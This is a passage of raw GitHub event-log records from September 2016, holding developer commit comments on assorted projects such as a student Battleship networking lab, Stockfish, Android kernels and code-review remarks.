<https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19071806>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANiCOS9eO_caF6oZivfhC4W6aceQXCnFks5qrYi_gaJpZM4J_dYG>\n> .\n>\n"}},"created_at":"2016-09-18T19:24:53Z"}
{"id":"4580467382","type":"CommitCommentEvent","actor":{"login":"luizperes"},"repo":{"name":"brain-labs/brainduino"},"payload":{"comment":{"id":19071959,"position":null,"line":null,"path":null,"commit_id":"45c1c098316ded46767af821ed3c688851a0d04b","created_at":"2016-09-18T19:24:56Z","updated_at":"2016-09-18T19:24:56Z","body":"Yesterday the `Ble_Shield_And_LCD.pde` was consuming __80%__ of the Arduino memory for variables! With these changes, we are now at __66%__ and there is still where to take off! I will study the code again later on when I start to build the `PPU`!"}},"created_at":"2016-09-18T19:24:56Z"}
{"id":"4580467617","type":"CommitCommentEvent","actor":{"login":"redferret"},"repo":{"name":"redferret/planet"},"payload":{"comment":{"id":19071960,"position":null,"line":null,"path":null,"commit_id":"412810d1413950006ca55bf7430c987a41bef8d0","created_at":"2016-09-18T19:25:05Z","updated_at":"2016-09-18T19:25:05Z","body":"I made some changes to the delays so that I can observe the true speed of thread processing"}},"created_at":"2016-09-18T19:25:05Z"}
{"id":"4580471917","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19071966,"position":null,"line":null,"path":null,"commit_id":"b352d0c4611ccc51eff0c643322e3bc3a9bb416f","created_at":"2016-09-18T19:27:53Z","updated_at":"2016-09-18T19:27:53Z","body":"So...how can a no functional change be a regression like this?\r\nBench tests show only about 0.2% slowdown...doesn´t seem to be so big to fail like this. "}},"created_at":"2016-09-18T19:27:53Z"}
{"id":"4580472513","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19071967,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-18T19:28:15Z","updated_at":"2016-09-18T19:28:15Z","body":"I got reading the file and filling the array to work but I can't omitt the\nnewline character. Supossedly there is a strip('/n') that should work with\nreading a file line by line but we need to read char by char. If you were\nable to leave out the /n than that is farther than I got.\n\nOn Sun, Sep 18, 2016 at 1:24 PM, Emmanuel-Armstrong <\nnotifications@github.com> wrote:\n\n> Oh crap I just realized, I've done some work on the file reading and\n> writing but I totally forgot to push it up to git! I'll see if I have any\n> more than you and if so I'll push up what I have when I get home from work\n> in a couple hours. Sorry about that!\n>\n>\n> On Sep 18, 2016 12:53 PM, \"dssquared\" <notifications@github.com> wrote:\n>\n> > I've started working with reading in the board file and filling the\n> array,\n> > about half success now. Once the board array is filled we can start\n> working\n> > on the rest. Not sure if we want to make a nother text file for the\n> client\n> > to keep track of the board since the client is re-invoked each time.\n> Can't\n> > really use an array since the program is restarted each time but writing\n> to\n> > a file from an array could be a pain. I will finish the server side\n> > creating the board array first, might use a list within a list.\n> > What do you guys want to work on or feel comfortable about working on?\n> >\n> > David\n> >\n> > On Sat, Sep 17, 2016 at 6:35 PM, David Schwehr <dpschwehr@gmail.com>\n> > wrote:\n> >\n> > > Just checked, the address for localhost is correct, the port numbers\n> and\n> > > ip being set from command line arguments is already implemented and I\n> > > checked the connection already. I was going to play around with\n> different\n> > > ways of making the board and http stuff next. I put a board.txt file in\n> > the\n> > > folder too to use to test reading the file and creating an array or\n> list\n> > of\n> > > lists for the board.\n> > > Remember to git pull before working on anything to make sure you have\n> the\n> > > most recent version.\n> > > I will be working on it some tonight and spending most the day on it\n> > > tomorrow.\n> > >\n> > > On Sat, Sep 17, 2016 at 6:30 PM, David Schwehr <dpschwehr@gmail.com>\n> > > wrote:\n> > >\n> > >> Right now the server is on 127.0.0.1( i may have the address wrong but\n> > it\n> > >> should be the address of localhost, which is the same no matter what\n> > >> machine it is running on) just to run it on your local machine to\n> test,\n> > it\n> > >> will be changed to the ip address of the machine it is running on when\n> > they\n> > >> grade it.\n> > >>\n> > >> On Sat, Sep 17, 2016 at 6:26 PM, David Schwehr <dpschwehr@gmail.com>\n> > >> wrote:\n> > >>\n> > >>> It is getting the fire commands from the command line arguments, that\n> > is\n> > >>> why the client is being invoked every play. The connection is made\n> > with the\n> > >>> port number and IP address passed in from the command line\n> arguments. I\n> > >>> have already wrote the code for the connection using the socket\n> > library.\n> > >>> Thev ariables for the x and y coords passed from the command line are\n> > >>> working just as you had them in your test.py, I added it to the\n> > client.py\n> > >>> file already. These variable will be used in the methods that send\n> the\n> > http\n> > >>> message. The http and passing in the variable I think will be the\n> easy\n> > >>> part, some of it is done and it works. The time consuming part is\n> > going to\n> > >>> be writing the code to maintain the board and \"serving\" the display\n> of\n> > the\n> > >>> board.\n> > >>> Tracking sunk ships will work as you suggested and this will be put\n> in\n> > a\n> > >>> method called from read_board or process_reply or done inside of\n> > >>> process_reply.\n> > >>>\n> > >>> On Sat, Sep 17, 2016 at 6:10 PM, tyler-sassaman <\n> > >>> notifications@github.com> wrote:\n> > >>>\n> > >>>> I was thinking about tracking sunk ships. Just a thought, but what\n> if\n> > >>>> we had a global variable for each ship (carrier = 5), and every time\n> > we hit\n> > >>>> that type of ship we decrement that value, and compare it to 0. so\n> if\n> > >>>> carrier gets to 0 then it has been hit 5 times which is the same\n> > thing as\n> > >>>> being sunk.\n> > >>>>\n> > >>>> —\n> > >>>> You are receiving this because you authored the thread.\n> > >>>> Reply to this email directly, view it on GitHub\n> > >>>> <https://github.com/dssquared/Networks_Lab1/commit/\n> > 7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19068085>,\n> > >>>> or mute the thread\n> > >>>> <https://github.com/notifications/unsubscribe-auth/AE8DG_y6gkDXIV5_\n> > YwVT263okb39zDjcks5qrIFygaJpZM4J_dYG>\n> > >>>> .\n> > >>>>\n> > >>>\n> > >>>\n> > >>\n> > >\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/dssquared/Networks_Lab1/commit/\n> 7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19071806>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/ANiCOS9eO_\n> caF6oZivfhC4W6aceQXCnFks5qrYi_gaJpZM4J_dYG>\n>\n> > .\n> >\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19071958>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AE8DG5F6ycythOV16iTCINZqZXSNnY3Fks5qrZAFgaJpZM4J_dYG>\n> .\n>\n"}},"created_at":"2016-09-18T19:28:15Z"}
{"id":"4580473544","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19071968,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-18T19:28:54Z","updated_at":"2016-09-18T19:28:54Z","body":"It's humans nature to move forward my friend.I am glad u  bought a new device ...using other device as DD and s4 for test is nice idea.I do the same.dat jflte is passion.u can't leave it so easy haha...mi5 is a beast!!in some days in will be back home so let's make some N rom for the people out there."}},"created_at":"2016-09-18T19:28:54Z"}
{"id":"4580474795","type":"CommitCommentEvent","actor":{"login":"Dolu1990"},"repo":{"name":"SpinalHDL/SpinalHDL"},"payload":{"comment":{"id":19071972,"position":null,"line":null,"path":null,"commit_id":"764193013f84cfe4f82d7d1f1739c4561ef65860","created_at":"2016-09-18T19:29:27Z","updated_at":"2016-09-18T19:29:27Z","body":"Hi,\r\nHow are you ^^ ?"}},"created_at":"2016-09-18T19:29:27Z"}
{"id":"4580475771","type":"CommitCommentEvent","actor":{"login":"redferret"},"repo":{"name":"redferret/planet"},"payload":{"comment":{"id":19071975,"position":24,"line":320,"path":"src/worlds/gui/basic/BasicPlanet.java","commit_id":"412810d1413950006ca55bf7430c987a41bef8d0","created_at":"2016-09-18T19:30:01Z","updated_at":"2016-09-18T19:30:01Z","body":"Obvious to add this variable"}},"created_at":"2016-09-18T19:30:01Z"}
{"id":"4580476285","type":"CommitCommentEvent","actor":{"login":"bozoweed"},"repo":{"name":"TrinityCore/WowPacketParser"},"payload":{"comment":{"id":19071978,"position":null,"line":null,"path":null,"commit_id":"d61cf48401cc6c0da448da5f7d4fbbfd6e9b2620","created_at":"2016-09-18T19:30:18Z","updated_at":"2016-09-18T19:30:18Z","body":"Please merge it into vincent-beta he can use dbc and i think is most complet :) but thanks you for your fix man :) "}},"created_at":"2016-09-18T19:30:18Z"}
{"id":"4580476443","type":"CommitCommentEvent","actor":{"login":"redferret"},"repo":{"name":"redferret/planet"},"payload":{"comment":{"id":19071979,"position":17,"line":311,"path":"src/worlds/gui/basic/BasicPlanet.java","commit_id":"412810d1413950006ca55bf7430c987a41bef8d0","created_at":"2016-09-18T19:30:23Z","updated_at":"2016-09-18T19:30:23Z","body":"To simplify code"}},"created_at":"2016-09-18T19:30:23Z"}
{"id":"4580476497","type":"CommitCommentEvent","actor":{"login":"dzieciou"},"repo":{"name":"dzieciou/curl-logger"},"payload":{"comment":{"id":19071980,"position":39,"line":53,"path":"src/main/java/com/github/dzieciou/testing/curl/CurlLoggingInterceptor.java","commit_id":"6b6f0358fef4e8f75ac6c9be55b7cf138e806945","created_at":"2016-09-18T19:30:25Z","updated_at":"2016-09-18T19:30:25Z","body":"@blacky0x0 Released in 0.5. Let me know if it works as you expected."}},"created_at":"2016-09-18T19:30:25Z"}
{"id":"4580477510","type":"CommitCommentEvent","actor":{"login":"lorenzwalthert"},"repo":{"name":"jonmcalder/swirl-courses"},"payload":{"comment":{"id":19071982,"position":null,"line":null,"path":null,"commit_id":"00e6eaf8b98ed8a34d00568161c5ea155960e9a6","created_at":"2016-09-18T19:31:05Z","updated_at":"2016-09-18T19:31:05Z","body":"As indicated in the commit message, I suppose this is WIP and just the beginning of the lesson, right? As you are probably aware of, a good overview of classes can be accessed via `?regex`..."}},"created_at":"2016-09-18T19:31:05Z"}
{"id":"4580477583","type":"CommitCommentEvent","actor":{"login":"dzieciou"},"repo":{"name":"dzieciou/curl-logger"},"payload":{"comment":{"id":19071983,"position":8,"line":21,"path":"src/main/java/com/github/dzieciou/testing/curl/CurlLoggingInterceptor.java","commit_id":"6b6f0358fef4e8f75ac6c9be55b7cf138e806945","created_at":"2016-09-18T19:31:08Z","updated_at":"2016-09-18T19:31:08Z","body":"@blacky0x0 I turned it into `protected` in 0.5 release. Let me know if it does work for you."}},"created_at":"2016-09-18T19:31:08Z"}
{"id":"4580478274","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular-workshops/angular2-testing"},"payload":{"comment":{"id":19071985,"position":1,"line":1,"path":"src/app/hero.service.isolated.spec.ts","commit_id":"1a445f69887b388cb92d8fc7c0d0547441e8c374","created_at":"2016-09-18T19:31:35Z","updated_at":"2016-09-18T19:31:35Z","body":"So if this wasn't here, you IDE would tell you that you are not using any of the imports from `@angular/http` :-)"}},"created_at":"2016-09-18T19:31:35Z"}
{"id":"4580478923","type":"CommitCommentEvent","actor":{"login":"gonzoid"},"repo":{"name":"gonzoid/picroscope"},"payload":{"comment":{"id":19071987,"position":3,"line":3,"path":"run_test.sh","commit_id":"131044e8315d3cd7bc770b46f63fa5f64566973b","created_at":"2016-09-18T19:32:03Z","updated_at":"2016-09-18T19:32:03Z","body":"Doh! Forgot about that.\r\n\r\nThat's now fixed in https://github.com/gonzoid/picroscope/commit/88ad8d4c394fffac9f0a9055c77e2130e23bfede."}},"created_at":"2016-09-18T19:32:03Z"}
{"id":"4580480312","type":"CommitCommentEvent","actor":{"login":"dzieciou"},"repo":{"name":"dzieciou/curl-logger"},"payload":{"comment":{"id":19071990,"position":6,"line":188,"path":"src/main/java/com/github/dzieciou/testing/curl/Http2Curl.java","commit_id":"f66b0931046bcf475d99ee931f4660eba79f3ab4","created_at":"2016-09-18T19:32:55Z","updated_at":"2016-09-18T19:32:55Z","body":"@blacky0x0 I have just released 0.5 version. It should be in Maven Central in a few hours. "}},"created_at":"2016-09-18T19:32:55Z"}
{"id":"4580482961","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":19071993,"position":null,"line":null,"path":null,"commit_id":"27c25faebd8124d859b2b9ac7db24e901b5c5ae3","created_at":"2016-09-18T19:34:46Z","updated_at":"2016-09-18T19:34:46Z","body":"Can you remove the function-bind dependency as well?"}},"created_at":"2016-09-18T19:34:46Z"}
{"id":"4580483464","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":19071995,"position":null,"line":null,"path":null,"commit_id":"27c25faebd8124d859b2b9ac7db24e901b5c5ae3","created_at":"2016-09-18T19:35:06Z","updated_at":"2016-09-18T19:35:06Z","body":"(Assuming it is in the package.json)"}},"created_at":"2016-09-18T19:35:06Z"}
{"id":"4580484852","type":"CommitCommentEvent","actor":{"login":"lorenzwalthert"},"repo":{"name":"jonmcalder/swirl-courses"},"payload":{"comment":{"id":19071996,"position":null,"line":null,"path":null,"commit_id":"34e63886d621415032d1c5b141414e595e2243f3","created_at":"2016-09-18T19:35:57Z","updated_at":"2016-09-18T19:35:57Z","body":"yes, should we open an issue? The thing is that it can't be implemented very easily I guess..."}},"created_at":"2016-09-18T19:35:57Z"}
{"id":"4580484860","type":"CommitCommentEvent","actor":{"login":"paglias"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":19071997,"position":null,"line":null,"path":null,"commit_id":"27c25faebd8124d859b2b9ac7db24e901b5c5ae3","created_at":"2016-09-18T19:35:58Z","updated_at":"2016-09-18T19:35:58Z","body":"👍 good catch!"}},"created_at":"2016-09-18T19:35:58Z"}
{"id":"4580487680","type":"CommitCommentEvent","actor":{"login":"Dragonjcgc"},"repo":{"name":"eBrigade/eBrigadeV2"},"payload":{"comment":{"id":19072000,"position":null,"line":null,"path":null,"commit_id":"4a7c430c162a4a353d778c3ea10380cb468bf24e","created_at":"2016-09-18T19:37:53Z","updated_at":"2016-09-18T19:37:53Z","body":"Suppression des foreign key dans la table qui provoquaient les bugs notamment dans tree behaviour\r\nChangement pour UTF8 de toute la table\r\nChangement pour MyIsam"}},"created_at":"2016-09-18T19:37:53Z"}
{"id":"4580488534","type":"CommitCommentEvent","actor":{"login":"wil93"},"repo":{"name":"cms-dev/cms"},"payload":{"comment":{"id":19072003,"position":null,"line":null,"path":null,"commit_id":"b6fa831fe95de2c858e43141c9bd423767c7f919","created_at":"2016-09-18T19:38:26Z","updated_at":"2016-09-18T19:38:26Z","body":"Maybe it's a good idea to add:\r\n\r\n```python\r\nassert isinstance(test.languages, list)\r\n```\r\n\r\nhere: https://github.com/cms-dev/cms/blob/b6fa831fe95de2c858e43141c9bd423767c7f919/cmstestsuite/testrunner.py#L282"}},"created_at":"2016-09-18T19:38:26Z"}
{"id":"4580488888","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19072005,"position":30,"line":182,"path":"geocodertest.py","commit_id":"e58dc8da454668cce1ca10311328d366afacb01b","created_at":"2016-09-18T19:38:41Z","updated_at":"2016-09-18T19:38:41Z","body":"ohh Sorry I missed it. Yes this will do."}},"created_at":"2016-09-18T19:38:41Z"}
{"id":"4580491442","type":"CommitCommentEvent","actor":{"login":"pustovitDmytro"},"repo":{"name":"pustovitDmytro/test"},"payload":{"comment":{"id":19072011,"position":1,"line":1,"path":"README.md","commit_id":"7867b6832e7fe36d3530ab7465218cc538288efd","created_at":"2016-09-18T19:40:19Z","updated_at":"2016-09-18T19:40:19Z","body":"new commit"}},"created_at":"2016-09-18T19:40:19Z"}
{"id":"4580493283","type":"CommitCommentEvent","actor":{"login":"SammysHP"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19072014,"position":null,"line":null,"path":null,"commit_id":"7559115d3c496d341045e27e5b1000d7d4a50877","created_at":"2016-09-18T19:41:27Z","updated_at":"2016-09-18T19:41:27Z","body":"That was already a problem with 20 caches, now it is even worse. IIRC we talked about a limit once. Not sure about the result, though."}},"created_at":"2016-09-18T19:41:27Z"}
{"id":"4580493532","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":19072016,"position":38,"line":1367,"path":"FHEM/00_SIGNALduino.pm","commit_id":"86f6fdb810699ad68560c7aa70954429b5e2607c","created_at":"2016-09-18T19:41:34Z","updated_at":"2016-09-18T19:41:34Z","body":"wenn bei get raw V3.2. eingegeben wird, dann können auch beim Dummy sduino ältere Mancester Nachrichten simuliert werden "}},"created_at":"2016-09-18T19:41:34Z"}
{"id":"4580495358","type":"CommitCommentEvent","actor":{"login":"abhi793"},"repo":{"name":"abhi793/MailApp"},"payload":{"comment":{"id":19072020,"position":5,"line":37,"path":"app/src/main/java/in/main/mailapp/EmailActivity.java","commit_id":"77614e96301944ee9e0a7b4216e0b64f5bdaeb6c","created_at":"2016-09-18T19:42:42Z","updated_at":"2016-09-18T19:42:42Z","body":"please dont hard code the urls"}},"created_at":"2016-09-18T19:42:42Z"}
{"id":"4580495924","type":"CommitCommentEvent","actor":{"login":"abhi793"},"repo":{"name":"abhi793/MailApp"},"payload":{"comment":{"id":19072022,"position":5,"line":42,"path":"app/src/main/java/in/main/mailapp/MailListActivity.java","commit_id":"77614e96301944ee9e0a7b4216e0b64f5bdaeb6c","created_at":"2016-09-18T19:43:01Z","updated_at":"2016-09-18T19:43:01Z","body":"please dont hard code the urls\r\n"}},"created_at":"2016-09-18T19:43:01Z"}
{"id":"4580497284","type":"CommitCommentEvent","actor":{"login":"eyosen"},"repo":{"name":"CyanogenMod/android_kernel_htc_msm8994"},"payload":{"comment":{"id":19072024,"position":null,"line":null,"path":null,"commit_id":"eb0a2f9572467451a6414a44c2e5ca34b89532e1","created_at":"2016-09-18T19:43:53Z","updated_at":"2016-09-18T19:43:53Z","body":"Is UNUSED() a macro defined somewhere else?\r\nWouldn't this work instead?\r\nstatic inline unsigned int kgsl_get_alloc_size(__attribute__((unused)) int detailed)"}},"created_at":"2016-09-18T19:43:53Z"}
{"id":"4580499280","type":"CommitCommentEvent","actor":{"login":"nksoff"},"repo":{"name":"frontend-park-mail-ru/2016_2_Technoteam"},"payload":{"comment":{"id":19072026,"position":4,"line":12,"path":"test.js","commit_id":"71b8b10a5ac2cec8372b052081b582dd1d7a381e","created_at":"2016-09-18T19:45:03Z","updated_at":"2016-09-18T19:45:03Z","body":"грустно и обидно, верните тест!\r\n\r\nвся разгадка в [String.prototype.replace](https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/String/replace) (когда первый аргумент - строка `Only the first occurrence will be replaced.`)"}},"created_at":"2016-09-18T19:45:03Z"}
{"id":"4580499634","type":"CommitCommentEvent","actor":{"login":"NicolasPetton"},"repo":{"name":"foretagsplatsen/emacs-js"},"payload":{"comment":{"id":19072027,"position":null,"line":null,"path":null,"commit_id":"69b041f240dc1b6239f51159ee4bd97e596ee7d5","created_at":"2016-09-18T19:45:14Z","updated_at":"2016-09-18T19:45:14Z","body":"Done, thanks!"}},"created_at":"2016-09-18T19:45:14Z"}
{"id":"4580499804","type":"CommitCommentEvent","actor":{"login":"jonmcalder"},"repo":{"name":"jonmcalder/swirl-courses"},"payload":{"comment":{"id":19072028,"position":null,"line":null,"path":null,"commit_id":"00e6eaf8b98ed8a34d00568161c5ea155960e9a6","created_at":"2016-09-18T19:45:20Z","updated_at":"2016-09-18T19:45:20Z","body":"yup - just getting started. I'm using a few different sources to try and work on what things to introduce in what order etc. Obviously the R help itself is often a core influencer in this regard."}},"created_at":"2016-09-18T19:45:20Z"}
{"id":"4580502570","type":"CommitCommentEvent","actor":{"login":"eyosen"},"repo":{"name":"CyanogenMod/android_kernel_htc_msm8994"},"payload":{"comment":{"id":19072031,"position":null,"line":null,"path":null,"commit_id":"eb0a2f9572467451a6414a44c2e5ca34b89532e1","created_at":"2016-09-18T19:47:00Z","updated_at":"2016-09-18T19:47:00Z","body":"I meant\r\n`static inline unsigned int kgsl_get_alloc_size(__attribute__((unused)) int detailed)`"}},"created_at":"2016-09-18T19:47:00Z"}
{"id":"4580503683","type":"CommitCommentEvent","actor":{"login":"VinayakBagaria"},"repo":{"name":"VinayakBagaria/Personal-Blogging"},"payload":{"comment":{"id":19072035,"position":null,"line":null,"path":null,"commit_id":"dadb9a044b22da44cb9c03507247f8a771913dbf","created_at":"2016-09-18T19:47:43Z","updated_at":"2016-09-18T19:47:43Z","body":"![blogs](https://cloud.githubusercontent.com/assets/17192467/18618555/d0527492-7e06-11e6-8749-1b49dea2108f.JPG)\r\n![login](https://cloud.githubusercontent.com/assets/17192467/18618557/d07446da-7e06-11e6-97c8-62f541003505.JPG)\r\n![post](https://cloud.githubusercontent.com/assets/17192467/18618558/d07dc516-7e06-11e6-9f07-24dad2611a1a.JPG)\r\n![run_app](https://cloud.githubusercontent.com/assets/17192467/18618556/d071bd52-7e06-11e6-8bfd-c1259305027d.JPG)\r\n"}},"created_at":"2016-09-18T19:47:43Z"}
{"id":"4580503874","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19072036,"position":null,"line":null,"path":null,"commit_id":"a6d71c941d9ee2c63f7af6f447862c172544f843","created_at":"2016-09-18T19:47:50Z","updated_at":"2016-09-18T19:47:50Z","body":"Well, it was in one file, but at this moment in development it is more practical for me to split these files."}},"created_at":"2016-09-18T19:47:50Z"}
{"id":"4580504828","type":"CommitCommentEvent","actor":{"login":"feriova365"},"repo":{"name":"feriova365/martina"},"payload":{"comment":{"id":19072037,"position":null,"line":null,"path":null,"commit_id":"95b3d456a5f67dc7ee636f57122d95661ef0a782","created_at":"2016-09-18T19:48:29Z","updated_at":"2016-09-18T19:48:29Z","body":"\r\n\r\n[``](url)"}},"created_at":"2016-09-18T19:48:29Z"}
{"id":"4580505287","type":"CommitCommentEvent","actor":{"login":"feriova365"},"repo":{"name":"feriova365/martina"},"payload":{"comment":{"id":19072038,"position":null,"line":null,"path":null,"commit_id":"95b3d456a5f67dc7ee636f57122d95661ef0a782","created_at":"2016-09-18T19:48:45Z","updated_at":"2016-09-18T19:48:45Z","body":"thenkz"}},"created_at":"2016-09-18T19:48:45Z"}
{"id":"4580507438","type":"CommitCommentEvent","actor":{"login":"MarcusCampos"},"repo":{"name":"MarcusCampos/Redes_EP"},"payload":{"comment":{"id":19072040,"position":null,"line":null,"path":null,"commit_id":"faa8dc5b7b241c3a131ebedf856f062ba59ed459","created_at":"2016-09-18T19:50:00Z","updated_at":"2016-09-18T19:50:00Z","body":"//hyh"}},"created_at":"2016-09-18T19:50:00Z"}
{"id":"4580510187","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19072042,"position":null,"line":null,"path":null,"commit_id":"b352d0c4611ccc51eff0c643322e3bc3a9bb416f","created_at":"2016-09-18T19:51:42Z","updated_at":"2016-09-18T19:51:42Z","body":"Speed testing doesn't work.\n\n\n\nOn Sunday, September 18, 2016, AlexandreMasta <notifications@github.com>\nwrote:\n\n> So...how can a no functional change be a regression like this?\n> Bench tests show only about 0.2% slowdown...doesn´t seem to be so big to\n> fail like this.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mcostalba/Stockfish/commit/b352d0c4611ccc51eff0c643322e3bc3a9bb416f#commitcomment-19071966>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABDGAX54V1ngB1l80aVkQSWGeQO8zkOUks5qrZC6gaJpZM4J__O4>\n> .\n>\n"}},"created_at":"2016-09-18T19:51:42Z"}
{"id":"4580510573","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19072043,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-18T19:51:55Z","updated_at":"2016-09-18T19:51:55Z","body":"Uh I forgot a really important thing: if someone wants to compile the rom and share it feel free to do it, but you know what's broken, and remember that I won't lose time to fix it, because N is out and I will work on it...! \r\nApart this mi5 is completely different than jflte, this means that 95% changes I made for mi5 won't affect jflte,  so I can work on both devices without big issues! And... Yeah, it's a beast...  144k on antutu with crappy prebuilt kernel... I hate xiaomi, but I love mi5 😀 \r\n![screenshot_20160917-172113](https://cloud.githubusercontent.com/assets/7747806/18618584/169915f4-7dea-11e6-8a97-60fe5f6d0dcd.png)\r\n"}},"created_at":"2016-09-18T19:51:55Z"}
{"id":"4580511074","type":"CommitCommentEvent","actor":{"login":"Balanar300hp"},"repo":{"name":"Balanar300hp/stack_tests"},"payload":{"comment":{"id":19072044,"position":null,"line":null,"path":null,"commit_id":"29f20fdf365a8d31f55429b2532c65f009ac6bcb","created_at":"2016-09-18T19:52:12Z","updated_at":"2016-09-18T19:52:12Z","body":"mem_copy function outside stack"}},"created_at":"2016-09-18T19:52:12Z"}
{"id":"4580511836","type":"CommitCommentEvent","actor":{"login":"raymanfx"},"repo":{"name":"CyanogenMod/android_kernel_htc_msm8994"},"payload":{"comment":{"id":19072045,"position":null,"line":null,"path":null,"commit_id":"eb0a2f9572467451a6414a44c2e5ca34b89532e1","created_at":"2016-09-18T19:52:41Z","updated_at":"2016-09-18T19:52:41Z","body":"It's the same, the UNUSED(x) macro does exactly that.\r\n__attribute__((unused)) is incredibly ugly and verbose though."}},"created_at":"2016-09-18T19:52:41Z"}
{"id":"4580514489","type":"CommitCommentEvent","actor":{"login":"AndropaX"},"repo":{"name":"Xiaomi-Mi4c-CyanogenMod-14/android_device_xiaomi_libra"},"payload":{"comment":{"id":19072047,"position":null,"line":null,"path":null,"commit_id":"68d7d6145a65d5cb19fa6a7050ce03c9c77890f5","created_at":"2016-09-18T19:54:12Z","updated_at":"2016-09-18T19:54:12Z","body":"Bad idea, default prefix is arm-eabi-"}},"created_at":"2016-09-18T19:54:12Z"}
{"id":"4580514719","type":"CommitCommentEvent","actor":{"login":"michihdeu"},"repo":{"name":"TravelMapping/HighwayData"},"payload":{"comment":{"id":19072048,"position":null,"line":null,"path":null,"commit_id":"f7d21d7713cad5c235161492be639fc9a0add569","created_at":"2016-09-18T19:54:20Z","updated_at":"2016-09-18T19:54:20Z","body":"I'm so stupid.... Thought I've double-checked everything....."}},"created_at":"2016-09-18T19:54:20Z"}
{"id":"4580514991","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"thisisniall/dsp"},"payload":{"comment":{"id":19072049,"position":null,"line":null,"path":null,"commit_id":"2341060a64881b05f566a26fdccec3b99d872c83","created_at":"2016-09-18T19:54:31Z","updated_at":"2016-09-18T19:54:31Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @thisisniall \r\n\r\nNice work on Python! Just one comment:\r\n- Q7, `remove_adjacent`: doesn't work on `[2,2,3,3,3]`, as it returns `[2,2,3]`.\r\n\r\nEverything else looks good!\r\n\r\n👍 "}},"created_at":"2016-09-18T19:54:31Z"}
{"id":"4580515148","type":"CommitCommentEvent","actor":{"login":"eyosen"},"repo":{"name":"CyanogenMod/android_kernel_htc_msm8994"},"payload":{"comment":{"id":19072050,"position":null,"line":null,"path":null,"commit_id":"eb0a2f9572467451a6414a44c2e5ca34b89532e1","created_at":"2016-09-18T19:54:38Z","updated_at":"2016-09-18T19:54:38Z","body":"I got undefined error for UNUSED(). That's why I was wondering."}},"created_at":"2016-09-18T19:54:38Z"}
{"id":"4580518049","type":"CommitCommentEvent","actor":{"login":"ZoroarkShade"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19072053,"position":null,"line":null,"path":null,"commit_id":"270db5d1c0e116b95de38e2a2c53564399417b40","created_at":"2016-09-18T19:56:23Z","updated_at":"2016-09-18T19:56:23Z","body":"[Only spanish]\r\nAcabe de captar que sin este código están entrando \"Bots\".\r\nLOG:\r\nBot aajdf9wa2u, Bot 1lofa6o46e, Bot yquuab551c, Bot 0dtwlqc3bk, Bot mqntgaqvdm, and 44 others joined; Bot we6d0mep41, Bot aajdf9wa2u, Bot 1lofa6o46e, Bot yquuab551c, Bot 0dtwlqc3bk, and 44 others left.\r\n\r\nVaya que es tedioso."}},"created_at":"2016-09-18T19:56:23Z"}
{"id":"4580518992","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19072055,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-18T19:56:57Z","updated_at":"2016-09-18T19:56:57Z","body":"I am now jealous...bought note 4 before 3 days.would I regret it ? Haha"}},"created_at":"2016-09-18T19:56:57Z"}
{"id":"4580520706","type":"CommitCommentEvent","actor":{"login":"cityplanningtechdotcom"},"repo":{"name":"cityplanningtechdotcom/cityplanningtechdotcom.github.io"},"payload":{"comment":{"id":19072057,"position":null,"line":null,"path":null,"commit_id":"81f1f1e92d3600668b56329224c6d1cf81be9082","created_at":"2016-09-18T19:58:01Z","updated_at":"2016-09-18T19:58:01Z","body":"changed"}},"created_at":"2016-09-18T19:58:01Z"}
